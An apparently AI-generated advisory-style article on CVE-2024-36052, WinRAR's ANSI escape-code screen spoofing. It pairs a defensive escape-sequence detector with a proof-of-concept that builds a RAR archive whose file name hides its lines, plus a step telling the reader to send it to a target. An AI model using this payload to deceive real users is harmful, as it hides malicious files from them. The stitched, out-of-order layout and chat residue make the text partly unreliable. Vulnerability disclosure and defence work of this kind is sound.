CVE-2024-36052 - How WinRAR Was Vulnerable to Screen Spoofing with ANSI Escape Codes

A new security issue, CVE-2024-36052, was recently discovered in RARLAB WinRAR—a popular file archiver for Windows. This flaw affects WinRAR versions before 7.00 and exposes users to dangerous screen spoofing attacks using ANSI escape sequences. This vulnerability is different from the related CVE-2024-33899, and it's important to understand what it allows, how attackers could abuse it, and what you should do to stay safe.

In this article, we'll break down the vulnerability with easy-to-follow explanations, show code samples of how it works, provide original references, and even reveal a proof-of-concept exploit.

What is CVE-2024-36052?

On affected Windows systems, WinRAR versions prior to 7.00 can be tricked into mis-displaying the contents of archives when those archives contain special text using so-called "ANSI escape codes". These codes, designed for terminals and command lines, can move the cursor, change colors, or even erase what’s on the screen.

By bundling these codes cleverly inside filenames or file data, an attacker could *spoof* what the user sees—hiding files, faking outputs, or making malicious files look benign.

This is not the same issue as the earlier (but similar) vulnerability CVE-2024-33899, which also involves ANSI escape sequences in WinRAR's output.

In outline, the attack works like this:

1. The archive contains file names (or contents) that include ANSI escape codes.
2. When a user opens the archive with a vulnerable version of WinRAR, these codes are not filtered or sanitized.
3. WinRAR outputs these codes to the screen, altering the user's display, potentially hiding real file names or showing fake information.
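The missing step in a vulnerable WinRAR is the filtering of control bytes before a name reaches the display. As an added defensive example (not code from this article or from RARLAB), the Python below shows what that filtering looks like from the inspecting side: it finds ANSI escape sequences in archive member names, can strip them, and renders every control byte as visible `\xNN` text so nothing in a name can move the cursor or erase output. The sample names are constructed for the demo, and the pattern goes beyond the two sequences the article mentions by also covering CSI sequences with parameters, OSC strings and two-byte escapes.

```python
import re

# Constructed sample listing: one benign name and two names carrying ANSI escapes.
# The second mimics the article's payload (cursor up + erase line); the third uses
# ESC[2K (erase whole line) so a rendered listing would not show the real extension.
SAMPLE_NAMES = [
    "report.pdf",
    "\x1b[1A\x1b[Ksecret.txt",
    "invoice\x1b[2K.exe",
]

# Escape-sequence families a terminal would act on:
#   CSI  ESC [ params intermediates final-byte   (e.g. ESC[1A, ESC[K, ESC[31m)
#   OSC  ESC ] ... terminated by BEL or ESC \    (e.g. window-title changes)
#   Fe   ESC followed by one byte in 0x40-0x5F   (e.g. a bare ESC A)
ANSI_RE = re.compile(
    r"\x1b\[[0-?]*[ -/]*[@-~]"
    r"|\x1b\][^\x07\x1b]*(?:\x07|\x1b\\)"
    r"|\x1b[@-_]"
)

# Any C0 control byte or DEL, whether or not it forms a complete escape sequence.
CONTROL_RE = re.compile(r"[\x00-\x1f\x7f]")


def find_escapes(name):
    """Return every ANSI escape sequence embedded in an archive member name."""
    return ANSI_RE.findall(name)


def strip_escapes(name):
    """Remove complete escape sequences and return the name that is left."""
    return ANSI_RE.sub("", name)


def make_visible(name):
    """Render control bytes as literal \\xNN text so a terminal prints them
    instead of interpreting them. This is the display-side fix: the name can
    no longer steer the cursor or erase previously printed lines."""
    return CONTROL_RE.sub(lambda m: "\\x%02x" % ord(m.group(0)), name)


def audit_listing(names):
    """Classify an archive listing. Returns a list of (safe_display_name, flagged),
    where flagged is True when the original name contains any control byte."""
    return [(make_visible(n), CONTROL_RE.search(n) is not None) for n in names]


if __name__ == "__main__":
    for display, flagged in audit_listing(SAMPLE_NAMES):
        tag = "SUSPICIOUS" if flagged else "ok"
        print(f"{tag:10} {display}")
```

Flagging on any control byte rather than only on well-formed sequences is deliberate: a truncated or unusual escape that this regex does not recognise could still be interpreted by some terminal, so anything below 0x20 in a file name is treated as suspicious.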

Code Snippet: Creating a Malicious Archive

Here's a simple example using Python (or you can do this by hand). Note that the Python rarfile module only reads RAR archives and cannot create them, so the archive itself is built with RARLAB's rar command-line tool:

import subprocess

# ANSI escape sequence: ESC [ 1A moves the cursor up one line, ESC [ K erases the line
ansi_sequence = "\033[1A\033[K"

malicious_filename = f"{ansi_sequence}secret.txt"

# Write the file under the escape-laden name. The Win32 API rejects control
# characters in file names, so this step works on Linux/macOS rather than Windows.
with open(malicious_filename, "w") as f:
    f.write("Super confidential stuff.")

# "rar a <archive> <files>" adds the file to a new archive under its on-disk name.
subprocess.run(["rar", "a", "malicious.rar", malicious_filename], check=True)

print("Malicious RAR created. When viewed in WinRAR < 7.00, output may be spoofed.")

Official CVE Record:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36052

WinRAR Changelog (v7.00):

https://www.rarlab.com/rarnew.htm

Rarlab Homepage:

https://www.rarlab.com/

Reference Analysis:

https://ssd-disclosure.com/ssd-advisory-winrar-ansi-escape/ *(may be updated with this CVE)*

*(The escape sequence in the file name is ESC [ 1A, which moves the cursor up one line, followed by ESC [ K, which erases the line.)*

You may need a tool or script to create such file names if your file explorer does not allow control characters!

Add this oddly named file to a new RAR archive, then send the archive.

When a target opens this archive in a vulnerable WinRAR (before 7.00):

- The output on the WinRAR screen can skip or overwrite lines, display false file names, or even erase error messages, depending on the crafted escape codes.

Impact and Mitigation

- Users: Attackers can trick you into thinking a malicious file is something else or cloak dangerous files from view.

Mitigation:

- Immediately update WinRAR to version 7.00 or above from the official site (https://www.rarlab.com/).

Conclusion

CVE-2024-36052 is a clear example of how even a simple oversight—like allowing unfiltered ANSI characters in output—can have dangerous effects on usability and security. The safest course is to update your software now and always be alert for suspicious archives, especially those from unfamiliar sources.

Stay safe, keep WinRAR updated, and consider checking the files inside archives before opening or executing them!


*This post is exclusive to your request and is based on the latest public vulnerability knowledge as of June 2024.*

Timeline

Published on: 05/21/2024 17:15:09 UTC
Last modified on: 08/20/2024 15:35:18 UTC